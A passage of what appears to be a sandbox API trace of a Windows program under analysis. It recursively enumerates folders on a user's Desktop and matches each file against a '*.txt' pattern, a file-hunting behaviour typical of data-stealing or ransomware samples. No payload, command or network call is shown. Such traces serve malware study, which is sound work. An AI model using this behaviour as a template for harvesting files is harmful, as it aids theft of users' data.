lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.640] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.640] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="QXzQAUh0jIi.bmp" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp") returned="\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp" [0110.641] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a04e8 [0110.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0110.641] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x42) returned 0x39700d0 [0110.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x39700d0, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", lpUsedDefaultChar=0x0) returned 66 [0110.641] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a11c0 [0110.641] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.641] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.641] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab28 [0110.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x29aab28, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.641] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab28 | out: hHeap=0x29a0000) returned 1 [0110.641] PathMatchSpecW (pszFile="QXzQAUh0jIi.bmp", pszSpec="*.txt") returned 0 [0110.641] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.641] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 1 [0110.641] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.641] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.641] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="YzBjdPQG.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg" [0110.641] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.641] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.641] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="YzBjdPQG.jpg" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg") returned="\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg" [0110.641] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0110.641] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a28a0 [0110.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x29a28a0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", lpUsedDefaultChar=0x0) returned 63 [0110.642] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2ed0 [0110.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28a0 | out: hHeap=0x29a0000) returned 1 [0110.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.642] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaaf8 [0110.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x29aaaf8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaaf8 | out: hHeap=0x29a0000) returned 1 [0110.642] PathMatchSpecW (pszFile="YzBjdPQG.jpg", pszSpec="*.txt") returned 0 [0110.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ed0 | out: hHeap=0x29a0000) returned 1 [0110.642] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 0 [0110.642] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0110.642] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.642] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x29a0560 [0110.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x29a0560, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpUsedDefaultChar=0x0) returned 50 [0110.642] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2e88 [0110.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.642] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaab0 [0110.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aaab0, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaab0 | out: hHeap=0x29a0000) returned 1 [0110.642] PathMatchSpecW (pszFile="_5VgSE0-6jvrM", pszSpec="*.txt") returned 0 [0110.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e88 | out: hHeap=0x29a0000) returned 1 [0110.642] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 0 [0110.642] FindClose (in: hFindFile=0x743920 | out: hFindFile=0x743920) returned 1 [0110.643] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x39700d0 [0110.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.643] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x24) returned 0x29a3258 [0110.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x29a3258, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpUsedDefaultChar=0x0) returned 36 [0110.643] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a04e8 [0110.643] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a3258 | out: hHeap=0x29a0000) returned 1 [0110.643] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.643] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aabd0 [0110.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aabd0, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.643] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabd0 | out: hHeap=0x29a0000) returned 1 [0110.643] PathMatchSpecW (pszFile="KTOu", pszSpec="*.txt") returned 0 [0110.643] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.643] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59203b50, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0x89c45de0, ftLastAccessTime.dwHighDateTime=0x1d7aeaa, ftLastWriteTime.dwLowDateTime=0x89c45de0, ftLastWriteTime.dwHighDateTime=0x1d7aeaa, nFileSizeHigh=0x0, nFileSizeLow=0xac61, dwReserved0=0x0, dwReserved1=0x0, cFileName="LyMn8DqKE.jpg", cAlternateFileName="LYMN8D~1.JPG")) returned 1 [0110.643] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.643] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.643] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="LyMn8DqKE.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg" [0110.643] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.643] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.643] lstrcatW (in: lpString1="\\", lpString2="LyMn8DqKE.jpg" | out: lpString1="\\LyMn8DqKE.jpg") returned="\\LyMn8DqKE.jpg" [0110.643] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.643] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x29a0550 [0110.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", cchWideChar=45, lpMultiByteStr=0x29a0550, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\LyMn8DqKE.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.644] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.644] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.644] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.644] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac00 [0110.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac00, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.644] PathMatchSpecW (pszFile="LyMn8DqKE.jpg", pszSpec="*.txt") returned 0 [0110.644] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39c99910, ftCreationTime.dwHighDateTime=0x1d7af1b, ftLastAccessTime.dwLowDateTime=0x44bbdf10, ftLastAccessTime.dwHighDateTime=0x1d7af4b, ftLastWriteTime.dwLowDateTime=0x44bbdf10, ftLastWriteTime.dwHighDateTime=0x1d7af4b, nFileSizeHigh=0x0, nFileSizeLow=0x6aba, dwReserved0=0x0, dwReserved1=0x0, cFileName="MB3JQQUgbwGVRNgeCA.gif", cAlternateFileName="MB3JQQ~1.GIF")) returned 1 [0110.644] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.644] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.644] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="MB3JQQUgbwGVRNgeCA.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif" [0110.644] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.644] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.644] lstrcatW (in: lpString1="\\", lpString2="MB3JQQUgbwGVRNgeCA.gif" | out: lpString1="\\MB3JQQUgbwGVRNgeCA.gif") returned="\\MB3JQQUgbwGVRNgeCA.gif" [0110.644] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.644] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x36) returned 0x29a0560 [0110.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", cchWideChar=54, lpMultiByteStr=0x29a0560, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\MB3JQQUgbwGVRNgeCA.gif", lpUsedDefaultChar=0x0) returned 54 [0110.644] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d68 [0110.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.644] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac78 [0110.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac78, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.644] PathMatchSpecW (pszFile="MB3JQQUgbwGVRNgeCA.gif", pszSpec="*.txt") returned 0 [0110.644] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c41370, ftCreationTime.dwHighDateTime=0x1d7ae73, ftLastAccessTime.dwLowDateTime=0x50a541d0, ftLastAccessTime.dwHighDateTime=0x1d7af24, ftLastWriteTime.dwLowDateTime=0x50a541d0, ftLastWriteTime.dwHighDateTime=0x1d7af24, nFileSizeHigh=0x0, nFileSizeLow=0x17a6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="O93_HCF.xlsx", cAlternateFileName="O93_HC~1.XLS")) returned 1 [0110.644] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.644] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.645] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="O93_HCF.xlsx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx" [0110.645] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.645] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.645] lstrcatW (in: lpString1="\\", lpString2="O93_HCF.xlsx" | out: lpString1="\\O93_HCF.xlsx") returned="\\O93_HCF.xlsx" [0110.645] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.645] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2c) returned 0x29a0550 [0110.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", cchWideChar=44, lpMultiByteStr=0x29a0550, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\O93_HCF.xlsx", lpUsedDefaultChar=0x0) returned 44 [0110.645] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.645] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaba0 [0110.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaba0, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.645] PathMatchSpecW (pszFile="O93_HCF.xlsx", pszSpec="*.txt") returned 0 [0110.645] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212b71d0, ftCreationTime.dwHighDateTime=0x1d7a377, ftLastAccessTime.dwLowDateTime=0xbbf74c40, ftLastAccessTime.dwHighDateTime=0x1d7ac26, ftLastWriteTime.dwLowDateTime=0xbbf74c40, ftLastWriteTime.dwHighDateTime=0x1d7ac26, nFileSizeHigh=0x0, nFileSizeLow=0x4735, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oar504.gif", cAlternateFileName="")) returned 1 [0110.645] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.645] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.645] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="Oar504.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif" [0110.645] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.645] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.645] lstrcatW (in: lpString1="\\", lpString2="Oar504.gif" | out: lpString1="\\Oar504.gif") returned="\\Oar504.gif" [0110.645] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.645] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x29a0550 [0110.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x29a0550, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", lpUsedDefaultChar=0x0) returned 42 [0110.646] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.646] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaac8 [0110.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaac8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.646] PathMatchSpecW (pszFile="Oar504.gif", pszSpec="*.txt") returned 0 [0110.646] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, 